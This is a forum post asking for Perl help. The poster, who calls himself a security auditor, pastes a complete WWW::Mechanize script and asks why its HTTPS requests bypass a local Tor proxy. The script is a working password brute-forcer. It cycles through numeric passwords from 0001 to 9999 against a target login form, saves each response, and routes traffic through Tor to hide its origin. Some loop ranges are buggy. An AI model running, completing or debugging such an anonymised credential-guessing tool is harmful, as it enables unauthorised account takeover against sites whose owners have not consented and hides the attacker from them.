Kind Monks,
I have a rather peculiar problem. Before I get to it, let me describe my situation(or you can skip to 'PROBLEM'), so you may understand my intentions are noble. I am a security auditor for my company, and my task is to find the vulnerable holes before malicious hackers do. My current project involves auditing their timesheet login page. My goal is to test for weak passwords, namely, the numeric possibilities from 1-9999(I have my own list of usernames). I have coded a rudimentary Perl program that handles the requests and logs the requests nicely. However, I am requested to perform the audit from an outsider's perspective, ie, no prior knowledge of the company. In keeping with the spirit of my directive, I'm using Tor to anonymize the connections. Tor runs as a proxy on localhost, and redirects the connections from there. It handles HTTP and HTTPS fine on my web browser, but not with my script. That brings me to my...
PROBLEM:
I cannot get SSL connections to use a proxy specified through WWW:Mechanize. HTTP connections appear to correctly filter through the proxy. Proxy is running on 127.0.0.1:8118, and handles HTTP/HTTPS fine. Netmon confirms these suspicions about TCP/SSL traffic from my script being handled differently.
SOLUTIONS ATTEMPTED:
1. Setting HTTP_Proxy and HTTPS_Proxy environment variables by hand
2. Using 'use Crypt:SLLeay'
3. Trying alternate proxy (web proxies)
What follows is the code for my program (naturally sanitized to remove sensitive info). I have searched far and wide for the answer, but cannot get a working solution. Monks, can you help me? It would be most appreciated.
CODE:
#!/usr/bin/perl
#Thanks to IBM for helping to create this - Bret Sweeden especially
#NBTDOTM
use WWW::Mechanize;
use HTTP::Cookies;
#$ENV{HTTPS_PROXY} = '127.0.0.1:8118';
#$ENV{HTTP_PROXY} = '127.0.0.1:8118';
#Determine the number of arguments the user has given us
$NumArgs = $#ARGV + 1;
if ($NumArgs == 0) {
#Our user has not entered any information. Display help screen.
header();
exit();}
elsif ($NumArgs == 1) {
#Our user has only entered some information. Display help screen.
header();
exit();}
if ($NumArgs == 2) {
#Our user has entered enough for an attack. Begin!
$host = $ARGV[0]; #Host is the first argument supplied
$user = $ARGV[1]; #Username is the 2nd argument supplied
#Display header
print qq{
----------------------------------------------------------------------
Login Brute-Forcer
Custom Built by Juno
NBTDOTM
----------------------------------------------------------------------
};
print "\nYour host is: $host";
print "\nYour username is: $user";
print "\n\nThe program will now try bruteforcing the host you selected
+";
my $url = $host;
my $username = $user;
#1-9
for $i (1 .. 9) {
print "\nTrying password 000$i...";
my $outfile = "000" . $i . ".htm";
my $password = "000" . $i;
my $mech = WWW::Mechanize->new();
$mech->cookie_jar(HTTP::Cookies->new());
$mech->proxy(['http', 'https'], 'http://127.0.0.1:8118/', 'https:/
+/127.0.0.1:8118/');
$mech->get($url);
$mech->field(j_username => $username);
$mech->field(j_password => $password);
$mech->click();
$mech->click();
my $output_page = $mech->content();
open(OUTFILE, ">$outfile");
print OUTFILE "$output_page";
close(OUTFILE);
print " Done.";
}
#10-99
for $i (10 .. 99) {
print "\nTrying password 00$i...";
my $outfile = "00" . $i . ".htm";
my $password = "00" . $i;
my $mech = WWW::Mechanize->new();
$mech->cookie_jar(HTTP::Cookies->new());
$mech->get($url);
#$mech->form_name('j');
$mech->field(j_username => $username);
$mech->field(j_password => $password);
$mech->click();
$mech->click();
my $output_page = $mech->content();
open(OUTFILE, ">$outfile");
print OUTFILE "$output_page";
close(OUTFILE);
print " Done.";
}
#100-999
for $i (1 .. 9) {
print "\nTrying password 0$i...";
my $outfile = "0" . $i . ".htm";
my $password = "0" . $i;
my $mech = WWW::Mechanize->new();
$mech->cookie_jar(HTTP::Cookies->new());
$mech->get($url);
#$mech->form_name('j');
$mech->field(j_username => $username);
$mech->field(j_password => $password);
$mech->click();
$mech->click();
my $output_page = $mech->content();
open(OUTFILE, ">$outfile");
print OUTFILE "$output_page";
close(OUTFILE);
print " Done.";
}
#1000-9999
for $i (1000 .. 9999) {
print "\nTrying password $i...";
my $outfile = $i . ".htm";
my $password = $i;
my $mech = WWW::Mechanize->new();
$mech->cookie_jar(HTTP::Cookies->new());
$mech->get($url);
#$mech->form_name('j');
$mech->field(j_username => $username);
$mech->field(j_password => $password);
$mech->click();
$mech->click();
my $output_page = $mech->content();
open(OUTFILE, ">$outfile");
print OUTFILE "$output_page";
close(OUTFILE);
print " Done.";
}
}
print "\n\nAudit complete!";
exit();
sub header{
print qq{
----------------------------------------------------------------------
Login Brute-Forcer
Custom Built by Juno
NBTDOTM
----------------------------------------------------------------------
Usage: GHGbrute -[target site] -[user]
Example: GHGbrute somesite.com -admin
The program will attempt a numerical bruteforce to four places.
};
}
-
Are you posting in the right place? Check out Where do I post X? to know for sure.
-
Posts may use any of the Perl Monks Approved HTML tags. Currently these include the following:
<code> <a> <b> <big>
<blockquote> <br /> <dd>
<dl> <dt> <em> <font>
<h1> <h2> <h3> <h4>
<h5> <h6> <hr /> <i>
<li> <nbsp> <ol> <p>
<small> <strike> <strong>
<sub> <sup> <table>
<td> <th> <tr> <tt>
<u> <ul>
-
Snippets of code should be wrapped in
<code> tags not
<pre> tags. In fact, <pre>
tags should generally be avoided. If they must
be used, extreme care should be
taken to ensure that their contents do not
have long lines (<70 chars), in order to prevent
horizontal scrolling (and possible janitor
intervention).
-
Want more info? How to link
or How to display code and escape characters
are good places to start.